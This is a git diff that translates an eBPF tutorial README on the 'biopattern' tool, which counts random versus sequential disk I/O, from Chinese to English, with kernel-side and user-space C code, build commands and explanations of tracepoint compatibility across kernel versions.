**Sequential I/O**: In contrast to random I/O, sequential I/O occurs when an application continuously reads or writes blocks of data to or from disk. The advantage of this I/O mode is that the disk head can move continuously in one direction, which greatly increases the speed at which data can be read and written. Video playback, downloading or uploading large files, and continuous logging are typical applications that generate sequential I/O. -为了实现存储性能的最优化,了解随机和顺序的磁盘 I/O 是至关重要的。例如,随机 I/O 敏感的应用程序在 SSD 上的性能通常远超于传统硬盘,因为 SSD 在处理随机 I/O 时几乎没有寻址延迟。相反,对于大量顺序 I/O 的应用,如何最大化磁盘的连续读写速度则更为关键。 +To optimise storage performance, it is critical to understand both random and sequential disk I/O. For example, random-I/O-sensitive applications typically perform far better on SSDs than on traditional hard drives, because SSDs have virtually no addressing latency when dealing with random I/O. Conversely, for applications with a lot of sequential I/O, it is much more important to maximise the sequential read and write speed of the disk. -在本教程的后续部分,我们将详细探讨如何使用 eBPF 工具来实时监控和统计这两种类型的磁盘 I/O。这不仅可以帮助我们更好地理解系统的 I/O 行为,还可以为进一步的性能优化提供有力的数据支持。 +In the rest of this tutorial, we will discuss in detail how to use the eBPF tool to monitor and count both types of disk I/O in real time. This will not only help us better understand the I/O behaviour of the system, but will also provide solid data for further performance optimisation. ## Biopattern -Biopattern 可以统计随机/顺序磁盘I/O次数的比例。 +Biopattern counts the ratio of random to sequential disk I/O operations. -首先,确保你已经正确安装了 libbpf 和相关的工具集,可以在这里找到对应的源代码:[bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) 关于如何安装依赖,请参考: +First of all, make sure that you have installed libbpf and the associated toolset correctly; you can find the source code here: [bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial). For instructions on installing the dependencies, please refer to: -导航到 `biopattern` 的源代码目录,并使用 `make` 命令进行编译: +Navigate to the `biopattern` source directory and compile it using the `make` command: ```bash cd ~/bpf-developer-tutorial/src/17-biopattern make ``` -编译成功后,你应该可以在当前目录下看到 `biopattern` 的可执行文件。基本的运行命令如下: +After successful compilation, you should see the `biopattern` executable in the current directory. The basic invocation is as follows: ```bash sudo ./biopattern [interval] [count] ``` -例如,要每秒打印一次输出,并持续10秒,你可以运行: +For example, to print the output once per second for 10 seconds, you can run: ```console $ sudo ./biopattern 1 10 @@ -48,24 +48,24 @@ sda 100 0 26 136 sda 0 100 1 4 ``` -输出列的含义如下: +The output columns have the following meanings: -- `DISK`:被追踪的磁盘名称。 -- `%RND`:随机 I/O 的百分比。 -- `%SEQ`:顺序 I/O 的百分比。 -- `COUNT`:在指定的时间间隔内的 I/O 请求次数。 -- `KBYTES`:在指定的时间间隔内读写的数据量(以 KB 为单位)。 +- `DISK`: Name of the disk being tracked. +- `%RND`: Percentage of random I/O. +- `%SEQ`: Percentage of sequential I/O. +- `COUNT`: Number of I/O requests in the specified interval. +- `KBYTES`: Amount of data (in KB) read and written in the specified interval. -从上述输出中,我们可以得出以下结论: +From the above output, we can draw the following conclusions: -- `sr0` 和 `sr1` 设备在观测期间主要进行了顺序 I/O,但数据量很小。 -- `sda` 设备在某些时间段内只进行了随机 I/O,而在其他时间段内只进行了顺序 I/O。 +- The `sr0` and `sr1` devices performed mostly sequential I/O during the observation period, but the amount of data was small. +- The `sda` device performed only random I/O during some time periods and only sequential I/O during other time periods.
-这些信息可以帮助我们了解系统的 I/O 模式,从而进行针对性的优化。 +This information can help us understand the I/O patterns of the system so that we can make targeted optimisations. -## eBPF Biopattern 实现原理 +## eBPF Biopattern Implementation Principles -首先,让我们看一下 biopattern 的核心 eBPF 内核态代码: +First, let's look at the core kernel-mode eBPF code of biopattern: ```c #include @@ -125,29 +125,27 @@ int handle__block_rq_complete(void *args) char LICENSE[] SEC("license") = "GPL"; ``` -1. 全局变量定义 +Global variable definitions: ```c - const volatile bool filter_dev = false; - const volatile __u32 targ_dev = 0; + const volatile bool filter_dev = false; + const volatile __u32 targ_dev = 0; ``` -这两个全局变量用于设备过滤。`filter_dev` 决定是否启用设备过滤,而 `targ_dev` 是我们想要追踪的目标设备的标识符。 +These two global variables are used for device filtering. `filter_dev` determines whether device filtering is enabled, and `targ_dev` is the identifier of the target device we want to track. -BPF map 定义: +BPF map definition: ```c - struct { - __uint(type, BPF_MAP_TYPE_HASH); - __uint(max_entries, 64); - __type(key, u32); - __type(value, struct counter); - } counters SEC(".maps"); + struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 64); + __type(key, u32); + __type(value, struct counter); + } counters SEC(".maps"); ``` -这部分代码定义了一个 BPF map,类型为哈希表。该映射的键是设备的标识符,而值是一个 `counter` 结构体,用于存储设备的 I/O 统计信息。 +This part of the code defines a BPF map of the hash-table type. The key of the map is the device identifier, and the value is a `counter` struct that stores the I/O statistics of the device. -追踪点函数: +The tracepoint function: ```c SEC("tracepoint/block/block_rq_complete") @@ -188,23 +186,26 @@ BPF map 定义: } ``` -在 Linux 中,每次块设备的 I/O 请求完成时,都会触发一个名为 `block_rq_complete` 的追踪点。这为我们提供了一个机会,通过 eBPF 来捕获这些事件,并进一步分析 I/O 的模式。 +In Linux, a tracepoint called `block_rq_complete` is triggered every time an I/O request for a block device completes. This gives us an opportunity to capture these events with eBPF and further analyse the I/O patterns. -主要逻辑分析: +Main logic analysis: -- **提取 I/O 请求信息**:从传入的参数中获取 I/O 请求的相关信息。这里有两种可能的上下文结构,取决于 `has_block_rq_completion` 的返回值。这是因为不同版本的 Linux 内核可能会有不同的追踪点定义。无论哪种情况,我们都从上下文中提取出扇区号 (`sector`)、扇区数量 (`nr_sector`) 和设备标识符 (`dev`)。 +- **Extracting I/O request information**: get information about the I/O request from the incoming parameters. There are two possible context structures, depending on the return value of `has_block_rq_completion`; this is because different versions of the Linux kernel may have different tracepoint definitions. In either case, we extract the sector number (`sector`), the number of sectors (`nr_sector`) and the device identifier (`dev`) from the context. - **Device filtering**: If device filtering is enabled (`filter_dev` is `true`) and the current device is not the target device (`targ_dev`), the function returns immediately. This allows the user to track only specific devices rather than all devices. - **Statistics update**: - **Lookup or initialise statistics**: use the `bpf_map_lookup_or_try_init` function to look up or initialise the statistics related to the current device. If there are no statistics for the current device in the map yet, they are initialised using the `zero` structure. - **Determine the I/O mode**: Based on the sector numbers of the current I/O request and the previous I/O request, we can determine whether the current request is random or sequential. If the two sector numbers are the same, it is sequential; otherwise, it is random. We then use the `__sync_fetch_and_add` function to update the corresponding statistics. This is an atomic operation that ensures data consistency in a concurrent environment. - **Update the amount of data**: we also update the total amount of data for the device, which is done by multiplying the number of sectors (`nr_sector`) by 512 (the number of bytes per sector). - **Update the sector number of the last I/O request**: for the next comparison, we update the value of `last_sector`. In some versions of the Linux kernel, the naming and structure of this tracepoint have changed due to the introduction of a new tracepoint, `block_rq_error`. As a result, the structure name of the former `block_rq_complete` tracepoint has been changed from `trace_event_raw_block_rq_complete` to `trace_event_raw_block_rq_completion`, a change which may cause compatibility issues for eBPF programs across different kernel versions. To address this issue, the `biopattern` utility introduces a mechanism to dynamically detect which tracepoint structure the running kernel uses, namely the `has_block_rq_completion` function. 1. **Define two tracepoint structures**: ```c struct trace_event_raw_block_rq_complete___x { @@ -220,9 +221,9 @@ BPF map 定义: } __attribute__((preserve_access_index)); ``` -这里定义了两种追踪点结构,分别对应于不同版本的内核。每种结构都包含设备标识符 (`dev`)、扇区号 (`sector`) 和扇区数量 (`nr_sector`)。 +Two tracepoint structures are defined here, corresponding to different versions of the kernel. Each structure contains a device identifier (`dev`), a sector number (`sector`), and a number of sectors (`nr_sector`). -**动态检测追踪点结构**: +**Dynamic detection of the tracepoint structure**: ```c static __always_inline bool has_block_rq_completion() @@ -233,13 +234,13 @@ BPF map 定义: } ``` -`has_block_rq_completion` 函数使用 `bpf_core_type_exists` 函数来检测当前内核是否存在 `trace_event_raw_block_rq_completion___x` 结构。如果存在,函数返回 `true`,表示当前内核使用的是新的追踪点结构;否则,返回 `false`,表示使用的是旧的结构。在对应的 eBPF 代码中,会根据两种不同的定义分别进行处理,这也是适配不同内核版本之间的变更常见的方案。 +The `has_block_rq_completion` function uses `bpf_core_type_exists` to detect whether the structure `trace_event_raw_block_rq_completion___x` exists in the current kernel. If it exists, the function returns `true`, indicating that the current kernel uses the new tracepoint structure; otherwise, it returns `false`, indicating that the old structure is in use. The two definitions are then handled separately in the corresponding eBPF code, which is a common way of adapting to changes between kernel versions.
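To make the dual definition concrete, here is a sketch of how the dispatch inside the tracepoint handler can look. This is a simplified reconstruction based on the structures and helper shown above rather than the full source; the statistics logic is elided:

```c
SEC("tracepoint/block/block_rq_complete")
int handle__block_rq_complete(void *args)
{
    sector_t sector;
    u32 nr_sector;
    u32 dev;

    /* choose the context layout that matches the running kernel */
    if (has_block_rq_completion()) {
        struct trace_event_raw_block_rq_completion___x *ctx = args;
        sector = BPF_CORE_READ(ctx, sector);
        nr_sector = BPF_CORE_READ(ctx, nr_sector);
        dev = BPF_CORE_READ(ctx, dev);
    } else {
        struct trace_event_raw_block_rq_complete___x *ctx = args;
        sector = BPF_CORE_READ(ctx, sector);
        nr_sector = BPF_CORE_READ(ctx, nr_sector);
        dev = BPF_CORE_READ(ctx, dev);
    }

    if (filter_dev && targ_dev != dev)
        return 0;

    /* ... look up the per-device counter and update the random/sequential
     * statistics as described in the list above ... */
    return 0;
}
```

Because both structures are declared with `__attribute__((preserve_access_index))`, the `BPF_CORE_READ` accesses are relocated against the running kernel's BTF at load time, so the same compiled object runs correctly on both old and new kernels.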
+In some versions of the Linux kernel, the naming and structure of this tracepoint changed with the introduction of a new tracepoint, `block_rq_error`: the structure name of the former `block_rq_complete` tracepoint changed from `trace_event_raw_block_rq_complete` to `trace_event_raw_block_rq_completion`. This change may cause compatibility issues for eBPF programs across kernel versions.

+To address this issue, the `biopattern` utility introduces a mechanism to dynamically detect which tracepoint structure the running kernel uses, namely the `has_block_rq_completion` function.

+1. **Define two tracepoint structures**:

```c
    struct trace_event_raw_block_rq_complete___x {
        dev_t dev;
        sector_t sector;
        unsigned int nr_sector;
    } __attribute__((preserve_access_index));

    struct trace_event_raw_block_rq_completion___x {
        dev_t dev;
        sector_t sector;
        unsigned int nr_sector;
    } __attribute__((preserve_access_index));
```

-这里定义了两种追踪点结构,分别对应于不同版本的内核。每种结构都包含设备标识符 (`dev`)、扇区号 (`sector`) 和扇区数量 (`nr_sector`)。
+Two tracepoint structures are defined here, corresponding to different kernel versions. Each structure contains the device identifier (`dev`), the sector number (`sector`), and the number of sectors (`nr_sector`).

-**动态检测追踪点结构**:
+**Dynamic detection of the tracepoint structure**:

```c
    static __always_inline bool has_block_rq_completion()
    {
        if (bpf_core_type_exists(struct trace_event_raw_block_rq_completion___x))
            return true;
        return false;
    }
```

-`has_block_rq_completion` 函数使用 `bpf_core_type_exists` 函数来检测当前内核是否存在 `trace_event_raw_block_rq_completion___x` 结构。如果存在,函数返回 `true`,表示当前内核使用的是新的追踪点结构;否则,返回 `false`,表示使用的是旧的结构。在对应的 eBPF 代码中,会根据两种不同的定义分别进行处理,这也是适配不同内核版本之间的变更常见的方案。
+The `has_block_rq_completion` function uses `bpf_core_type_exists` to detect whether the `trace_event_raw_block_rq_completion___x` structure exists in the current kernel. If it exists, the function returns `true`, indicating that the current kernel uses the new tracepoint structure; otherwise it returns `false`, indicating that the old structure is in use. The corresponding eBPF code then handles the two definitions separately, which is a common way of adapting to changes between kernel versions.

-### 用户态代码
+### User-Space Code

-`biopattern` 工具的用户态代码负责从 BPF 映射中读取统计数据,并将其展示给用户。通过这种方式,系统管理员可以实时监控每个设备的 I/O 模式,从而更好地理解和优化系统的 I/O 性能。
+The `biopattern` tool's user-space code is responsible for reading statistics from the BPF map and presenting them to the user. In this way, system administrators can monitor the I/O patterns of each device in real time and better understand and optimise the system's I/O performance.

-主循环:
+Main loop:

```c
    /* main: poll */
    while (1) {
        sleep(env.interval);

        err = print_map(obj->maps.counters, partitions);
        if (err)
            break;

        if (exiting || --env.times == 0)
            break;
    }
```

-这是 `biopattern` 工具的主循环,它的工作流程如下:
+This is the main loop of the `biopattern` utility; its workflow is as follows:

-- **等待**:使用 `sleep` 函数等待指定的时间间隔 (`env.interval`)。
-- **打印映射**:调用 `print_map` 函数打印 BPF 映射中的统计数据。
-- **退出条件**:如果收到退出信号 (`exiting` 为 `true`) 或者达到指定的运行次数 (`env.times` 达到 0),则退出循环。
+- **Wait**: use the `sleep` function to wait for the specified interval (`env.interval`).
+- **Print the map**: call the `print_map` function to print the statistics in the BPF map.
+- **Exit condition**: if an exit signal has been received (`exiting` is `true`) or the specified number of runs is reached (`env.times` reaches 0), exit the loop.

-打印映射函数:
+The `print_map` function:

```c
static int print_map(struct bpf_map *counters, struct partitions *partitions)
{
    __u32 total, lookup_key = -1, next_key;
    int err, fd = bpf_map__fd(counters);
    const struct partition *partition;
    struct counter counter;
    struct tm *tm;
    char ts[32];
    time_t t;

    while (!bpf_map_get_next_key(fd, &lookup_key, &next_key)) {
        err = bpf_map_lookup_elem(fd, &next_key, &counter);
        if (err < 0) {
            fprintf(stderr, "failed to lookup counters: %d\n", err);
            return -1;
        }
        lookup_key = next_key;
        total = counter.sequential + counter.random;
        if (!total)
            continue;
        if (env.timestamp) {
            time(&t);
            tm = localtime(&t);
            strftime(ts, sizeof(ts), "%H:%M:%S", tm);
            printf("%-9s ", ts);
        }
        partition = partitions__get_by_dev(partitions, next_key);
        printf("%-7s %5ld %5ld %8d %10lld\n",
               partition ? partition->name : "Unknown",
               counter.random * 100L / total,
               counter.sequential * 100L / total, total,
               counter.bytes / 1024);
    }

    lookup_key = -1;
    while (!bpf_map_get_next_key(fd, &lookup_key, &next_key)) {
        err = bpf_map_delete_elem(fd, &next_key);
        if (err < 0) {
            fprintf(stderr, "failed to cleanup counters: %d\n", err);
            return -1;
        }
        lookup_key = next_key;
    }

    return 0;
}
```

-`print_map` 函数负责从 BPF 映射中读取统计数据,并将其打印到控制台。其主要逻辑如下:
+The `print_map` function is responsible for reading statistics from the BPF map and printing them to the console. Its main logic is as follows:

-- **遍历 BPF 映射**:使用 `bpf_map_get_next_key` 和 `bpf_map_lookup_elem` 函数遍历 BPF 映射,获取每个设备的统计数据。
-- **计算总数**:计算每个设备的随机和顺序 I/O 的总数。
-- **打印统计数据**:如果启用了时间戳 (`env.timestamp` 为 `true`),则首先打印当前时间。接着,打印设备名称、随机 I/O 的百分比、顺序 I/O 的百分比、总 I/O 数量和总数据量(以 KB 为单位)。
-- **清理 BPF 映射**:为了下一次的统计,使用 `bpf_map_get_next_key` 和 `bpf_map_delete_elem` 函数清理 BPF 映射中的所有条目。
+- **Traverse the BPF map**: use the `bpf_map_get_next_key` and `bpf_map_lookup_elem` functions to traverse the BPF map and fetch the statistics for each device.
+- **Calculate totals**: calculate the total number of random and sequential I/Os for each device.
+- **Print statistics**: if timestamps are enabled (`env.timestamp` is `true`), the current time is printed first. Next, the device name, the percentage of random I/O, the percentage of sequential I/O, the total I/O count, and the total amount of data (in KB) are printed.
+- **Clean up the BPF map**: to prepare for the next interval, use the `bpf_map_get_next_key` and `bpf_map_delete_elem` functions to remove all entries from the BPF map.

-## 总结
+## Summary

-在本教程中,我们深入探讨了如何使用 eBPF 工具 biopattern 来实时监控和统计随机和顺序的磁盘 I/O。我们首先了解了随机和顺序磁盘 I/O 的重要性,以及它们对系统性能的影响。接着,我们详细介绍了 biopattern 的工作原理,包括如何定义和使用 BPF maps,如何处理不同版本的 Linux 内核中的追踪点变化,以及如何在 eBPF 程序中捕获和分析磁盘 I/O 事件。
+In this tutorial, we take an in-depth look at how to use the eBPF tool biopattern to monitor and count random and sequential disk I/O in real time. We start by understanding the importance of random and sequential disk I/O and their impact on system performance.
We then describe in detail how biopattern works, including how to define and use BPF maps, how to deal with tracepoint variations in different versions of the Linux kernel, and how to capture and analyse disk I/O events in an eBPF program. -您可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 +You can visit our tutorial code repository [at https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) or our website [at https://eunomia.dev/zh/tutorials/](https://eunomia.dev/zh/tutorials/) for more examples and a complete tutorial. -- 完整代码: -- bcc 工具: +- Source repo: +- bcc tool: + +> The original link of this article: diff --git a/src/17-biopattern/README.zh.md b/src/17-biopattern/README.zh.md new file mode 100644 index 0000000..e07e976 --- /dev/null +++ b/src/17-biopattern/README.zh.md @@ -0,0 +1,329 @@ +# eBPF 入门实践教程十七:编写 eBPF 程序统计随机/顺序磁盘 I/O + +eBPF(扩展的伯克利数据包过滤器)是 Linux 内核中的一种新技术,允许用户在内核空间中执行自定义程序,而无需更改内核代码。这为系统管理员和开发者提供了强大的工具,可以深入了解和监控系统的行为,从而进行优化。 + +在本篇教程中,我们将探索如何使用 eBPF 编写程序来统计随机和顺序的磁盘 I/O。磁盘 I/O 是计算机性能的关键指标之一,特别是在数据密集型应用中。 + +## 随机/顺序磁盘 I/O + +随着技术的进步和数据量的爆炸性增长,磁盘 I/O 成为了系统性能的关键瓶颈。应用程序的性能很大程度上取决于其如何与存储层进行交互。因此,深入了解和优化磁盘 I/O,特别是随机和顺序的 I/O,变得尤为重要。 + +1. **随机 I/O**:随机 I/O 发生在应用程序从磁盘的非连续位置读取或写入数据时。这种 I/O 模式的主要特点是磁盘头需要频繁地在不同的位置之间移动,导致其通常比顺序 I/O 的速度慢。典型的产生随机 I/O 的场景包括数据库查询、文件系统的元数据操作以及虚拟化环境中的并发任务。 + +2. **顺序 I/O**:与随机 I/O 相反,顺序 I/O 是当应用程序连续地读取或写入磁盘上的数据块。这种 I/O 模式的优势在于磁盘头可以在一个方向上连续移动,从而大大提高了数据的读写速度。视频播放、大型文件的下载或上传以及连续的日志记录都是产生顺序 I/O 的典型应用。 + +为了实现存储性能的最优化,了解随机和顺序的磁盘 I/O 是至关重要的。例如,随机 I/O 敏感的应用程序在 SSD 上的性能通常远超于传统硬盘,因为 SSD 在处理随机 I/O 时几乎没有寻址延迟。相反,对于大量顺序 I/O 的应用,如何最大化磁盘的连续读写速度则更为关键。 + +在本教程的后续部分,我们将详细探讨如何使用 eBPF 工具来实时监控和统计这两种类型的磁盘 I/O。这不仅可以帮助我们更好地理解系统的 I/O 行为,还可以为进一步的性能优化提供有力的数据支持。 + +## Biopattern + +Biopattern 可以统计随机/顺序磁盘I/O次数的比例。 + +首先,确保你已经正确安装了 libbpf 和相关的工具集,可以在这里找到对应的源代码:[bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) 关于如何安装依赖,请参考: + +导航到 `biopattern` 的源代码目录,并使用 `make` 命令进行编译: + +```bash +cd ~/bpf-developer-tutorial/src/17-biopattern +make +``` + +编译成功后,你应该可以在当前目录下看到 `biopattern` 的可执行文件。基本的运行命令如下: + +```bash +sudo ./biopattern [interval] [count] +``` + +例如,要每秒打印一次输出,并持续10秒,你可以运行: + +```console +$ sudo ./biopattern 1 10 +Tracing block device I/O requested seeks... Hit Ctrl-C to end. 
+DISK %RND %SEQ COUNT KBYTES +sr0 0 100 3 0 +sr1 0 100 8 0 +sda 0 100 1 4 +sda 100 0 26 136 +sda 0 100 1 4 +``` + +输出列的含义如下: + +- `DISK`:被追踪的磁盘名称。 +- `%RND`:随机 I/O 的百分比。 +- `%SEQ`:顺序 I/O 的百分比。 +- `COUNT`:在指定的时间间隔内的 I/O 请求次数。 +- `KBYTES`:在指定的时间间隔内读写的数据量(以 KB 为单位)。 + +从上述输出中,我们可以得出以下结论: + +- `sr0` 和 `sr1` 设备在观测期间主要进行了顺序 I/O,但数据量很小。 +- `sda` 设备在某些时间段内只进行了随机 I/O,而在其他时间段内只进行了顺序 I/O。 + +这些信息可以帮助我们了解系统的 I/O 模式,从而进行针对性的优化。 + +## eBPF Biopattern 实现原理 + +首先,让我们看一下 biopattern 的核心 eBPF 内核态代码: + +```c +#include +#include +#include +#include "biopattern.h" +#include "maps.bpf.h" +#include "core_fixes.bpf.h" + +const volatile bool filter_dev = false; +const volatile __u32 targ_dev = 0; + +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 64); + __type(key, u32); + __type(value, struct counter); +} counters SEC(".maps"); + +SEC("tracepoint/block/block_rq_complete") +int handle__block_rq_complete(void *args) +{ + struct counter *counterp, zero = {}; + sector_t sector; + u32 nr_sector; + u32 dev; + + if (has_block_rq_completion()) { + struct trace_event_raw_block_rq_completion___x *ctx = args; + sector = BPF_CORE_READ(ctx, sector); + nr_sector = BPF_CORE_READ(ctx, nr_sector); + dev = BPF_CORE_READ(ctx, dev); + } else { + struct trace_event_raw_block_rq_complete___x *ctx = args; + sector = BPF_CORE_READ(ctx, sector); + nr_sector = BPF_CORE_READ(ctx, nr_sector); + dev = BPF_CORE_READ(ctx, dev); + } + + if (filter_dev && targ_dev != dev) + return 0; + + counterp = bpf_map_lookup_or_try_init(&counters, &dev, &zero); + if (!counterp) + return 0; + if (counterp->last_sector) { + if (counterp->last_sector == sector) + __sync_fetch_and_add(&counterp->sequential, 1); + else + __sync_fetch_and_add(&counterp->random, 1); + __sync_fetch_and_add(&counterp->bytes, nr_sector * 512); + } + counterp->last_sector = sector + nr_sector; + return 0; +} + +char LICENSE[] SEC("license") = "GPL"; +``` + +1. 
全局变量定义 + +```c + const volatile bool filter_dev = false; + const volatile __u32 targ_dev = 0; +``` + +这两个全局变量用于设备过滤。`filter_dev` 决定是否启用设备过滤,而 `targ_dev` 是我们想要追踪的目标设备的标识符。 + +BPF map 定义: + +```c + struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 64); + __type(key, u32); + __type(value, struct counter); + } counters SEC(".maps"); +``` + +这部分代码定义了一个 BPF map,类型为哈希表。该映射的键是设备的标识符,而值是一个 `counter` 结构体,用于存储设备的 I/O 统计信息。 + +追踪点函数: + +```c + SEC("tracepoint/block/block_rq_complete") + int handle__block_rq_complete(void *args) + { + struct counter *counterp, zero = {}; + sector_t sector; + u32 nr_sector; + u32 dev; + + if (has_block_rq_completion()) { + struct trace_event_raw_block_rq_completion___x *ctx = args; + sector = BPF_CORE_READ(ctx, sector); + nr_sector = BPF_CORE_READ(ctx, nr_sector); + dev = BPF_CORE_READ(ctx, dev); + } else { + struct trace_event_raw_block_rq_complete___x *ctx = args; + sector = BPF_CORE_READ(ctx, sector); + nr_sector = BPF_CORE_READ(ctx, nr_sector); + dev = BPF_CORE_READ(ctx, dev); + } + + if (filter_dev && targ_dev != dev) + return 0; + + counterp = bpf_map_lookup_or_try_init(&counters, &dev, &zero); + if (!counterp) + return 0; + if (counterp->last_sector) { + if (counterp->last_sector == sector) + __sync_fetch_and_add(&counterp->sequential, 1); + else + __sync_fetch_and_add(&counterp->random, 1); + __sync_fetch_and_add(&counterp->bytes, nr_sector * 512); + } + counterp->last_sector = sector + nr_sector; + return 0; + } +``` + +在 Linux 中,每次块设备的 I/O 请求完成时,都会触发一个名为 `block_rq_complete` 的追踪点。这为我们提供了一个机会,通过 eBPF 来捕获这些事件,并进一步分析 I/O 的模式。 + +主要逻辑分析: + +- **提取 I/O 请求信息**:从传入的参数中获取 I/O 请求的相关信息。这里有两种可能的上下文结构,取决于 `has_block_rq_completion` 的返回值。这是因为不同版本的 Linux 内核可能会有不同的追踪点定义。无论哪种情况,我们都从上下文中提取出扇区号 (`sector`)、扇区数量 (`nr_sector`) 和设备标识符 (`dev`)。 +- **设备过滤**:如果启用了设备过滤 (`filter_dev` 为 `true`),并且当前设备不是目标设备 (`targ_dev`),则直接返回。这允许用户只追踪特定的设备,而不是所有设备。 +- **统计信息更新**: + - **查找或初始化统计信息**:使用 `bpf_map_lookup_or_try_init` 函数查找或初始化与当前设备相关的统计信息。如果映射中没有当前设备的统计信息,它会使用 `zero` 结构体进行初始化。 + - **判断 I/O 模式**:根据当前 I/O 请求与上一个 I/O 请求的扇区号,我们可以判断当前请求是随机的还是顺序的。如果两次请求的扇区号相同,那么它是顺序的;否则,它是随机的。然后,我们使用 `__sync_fetch_and_add` 函数更新相应的统计信息。这是一个原子操作,确保在并发环境中数据的一致性。 + - **更新数据量**:我们还更新了该设备的总数据量,这是通过将扇区数量 (`nr_sector`) 乘以 512(每个扇区的字节数)来实现的。 + - **更新最后一个 I/O 请求的扇区号**:为了下一次的比较,我们更新了 `last_sector` 的值。 + +在 Linux 内核的某些版本中,由于引入了一个新的追踪点 `block_rq_error`,追踪点的命名和结构发生了变化。这意味着,原先的 `block_rq_complete` 追踪点的结构名称从 `trace_event_raw_block_rq_complete` 更改为 `trace_event_raw_block_rq_completion`。这种变化可能会导致 eBPF 程序在不同版本的内核上出现兼容性问题。 + +为了解决这个问题,`biopattern` 工具引入了一种机制来动态检测当前内核使用的是哪种追踪点结构,即 `has_block_rq_completion` 函数。 + +1. 
**定义两种追踪点结构**: + +```c + struct trace_event_raw_block_rq_complete___x { + dev_t dev; + sector_t sector; + unsigned int nr_sector; + } __attribute__((preserve_access_index)); + + struct trace_event_raw_block_rq_completion___x { + dev_t dev; + sector_t sector; + unsigned int nr_sector; + } __attribute__((preserve_access_index)); +``` + +这里定义了两种追踪点结构,分别对应于不同版本的内核。每种结构都包含设备标识符 (`dev`)、扇区号 (`sector`) 和扇区数量 (`nr_sector`)。 + +**动态检测追踪点结构**: + +```c + static __always_inline bool has_block_rq_completion() + { + if (bpf_core_type_exists(struct trace_event_raw_block_rq_completion___x)) + return true; + return false; + } +``` + +`has_block_rq_completion` 函数使用 `bpf_core_type_exists` 函数来检测当前内核是否存在 `trace_event_raw_block_rq_completion___x` 结构。如果存在,函数返回 `true`,表示当前内核使用的是新的追踪点结构;否则,返回 `false`,表示使用的是旧的结构。在对应的 eBPF 代码中,会根据两种不同的定义分别进行处理,这也是适配不同内核版本之间的变更常见的方案。 + +### 用户态代码 + +`biopattern` 工具的用户态代码负责从 BPF 映射中读取统计数据,并将其展示给用户。通过这种方式,系统管理员可以实时监控每个设备的 I/O 模式,从而更好地理解和优化系统的 I/O 性能。 + +主循环: + +```c + /* main: poll */ + while (1) { + sleep(env.interval); + + err = print_map(obj->maps.counters, partitions); + if (err) + break; + + if (exiting || --env.times == 0) + break; + } +``` + +这是 `biopattern` 工具的主循环,它的工作流程如下: + +- **等待**:使用 `sleep` 函数等待指定的时间间隔 (`env.interval`)。 +- **打印映射**:调用 `print_map` 函数打印 BPF 映射中的统计数据。 +- **退出条件**:如果收到退出信号 (`exiting` 为 `true`) 或者达到指定的运行次数 (`env.times` 达到 0),则退出循环。 + +打印映射函数: + +```c + static int print_map(struct bpf_map *counters, struct partitions *partitions) + { + __u32 total, lookup_key = -1, next_key; + int err, fd = bpf_map__fd(counters); + const struct partition *partition; + struct counter counter; + struct tm *tm; + char ts[32]; + time_t t; + + while (!bpf_map_get_next_key(fd, &lookup_key, &next_key)) { + err = bpf_map_lookup_elem(fd, &next_key, &counter); + if (err < 0) { + fprintf(stderr, "failed to lookup counters: %d\n", err); + return -1; + } + lookup_key = next_key; + total = counter.sequential + counter.random; + if (!total) + continue; + if (env.timestamp) { + time(&t); + tm = localtime(&t); + strftime(ts, sizeof(ts), "%H:%M:%S", tm); + printf("%-9s ", ts); + } + partition = partitions__get_by_dev(partitions, next_key); + printf("%-7s %5ld %5ld %8d %10lld\n", + partition ? 
partition->name : "Unknown", + counter.random * 100L / total, + counter.sequential * 100L / total, total, + counter.bytes / 1024); + } + + lookup_key = -1; + while (!bpf_map_get_next_key(fd, &lookup_key, &next_key)) { + err = bpf_map_delete_elem(fd, &next_key); + if (err < 0) { + fprintf(stderr, "failed to cleanup counters: %d\n", err); + return -1; + } + lookup_key = next_key; + } + + return 0; + } +``` + +`print_map` 函数负责从 BPF 映射中读取统计数据,并将其打印到控制台。其主要逻辑如下: + +- **遍历 BPF 映射**:使用 `bpf_map_get_next_key` 和 `bpf_map_lookup_elem` 函数遍历 BPF 映射,获取每个设备的统计数据。 +- **计算总数**:计算每个设备的随机和顺序 I/O 的总数。 +- **打印统计数据**:如果启用了时间戳 (`env.timestamp` 为 `true`),则首先打印当前时间。接着,打印设备名称、随机 I/O 的百分比、顺序 I/O 的百分比、总 I/O 数量和总数据量(以 KB 为单位)。 +- **清理 BPF 映射**:为了下一次的统计,使用 `bpf_map_get_next_key` 和 `bpf_map_delete_elem` 函数清理 BPF 映射中的所有条目。 + +## 总结 + +在本教程中,我们深入探讨了如何使用 eBPF 工具 biopattern 来实时监控和统计随机和顺序的磁盘 I/O。我们首先了解了随机和顺序磁盘 I/O 的重要性,以及它们对系统性能的影响。接着,我们详细介绍了 biopattern 的工作原理,包括如何定义和使用 BPF maps,如何处理不同版本的 Linux 内核中的追踪点变化,以及如何在 eBPF 程序中捕获和分析磁盘 I/O 事件。 + +您可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 + +- 完整代码: +- bcc 工具: diff --git a/src/17-biopattern/README_en.md b/src/17-biopattern/README_en.md deleted file mode 100644 index 2a7cb9c..0000000 --- a/src/17-biopattern/README_en.md +++ /dev/null @@ -1,332 +0,0 @@ -# eBPF Tutorial by Example 17: Count Random/Sequential Disk I/O - -eBPF (Extended Berkeley Packet Filter) is a new technology in the Linux kernel that allows users to execute custom programmes in kernel space without changing the kernel code. This provides system administrators and developers with powerful tools to gain insight into and monitor system behaviour for optimisation. - -In this tutorial, we will explore how to use eBPF to write programs to count random and sequential disk I/O. Disk I/O is one of the key metrics of computer performance, especially in data-intensive applications. - -## Random/Sequential Disk I/O - -As technology advances and data volumes explode, disk I/O becomes a critical bottleneck in system performance. The performance of an application depends heavily on how it interacts with the storage tier. Therefore, it becomes especially important to deeply understand and optimise disk I/O, especially random and sequential I/O. - -1. **Random I/O**: Random I/O occurs when an application reads or writes data from or to a non-sequential location on the disk. The main characteristic of this I/O mode is that the disk head needs to move frequently between locations, causing it to be typically slower than 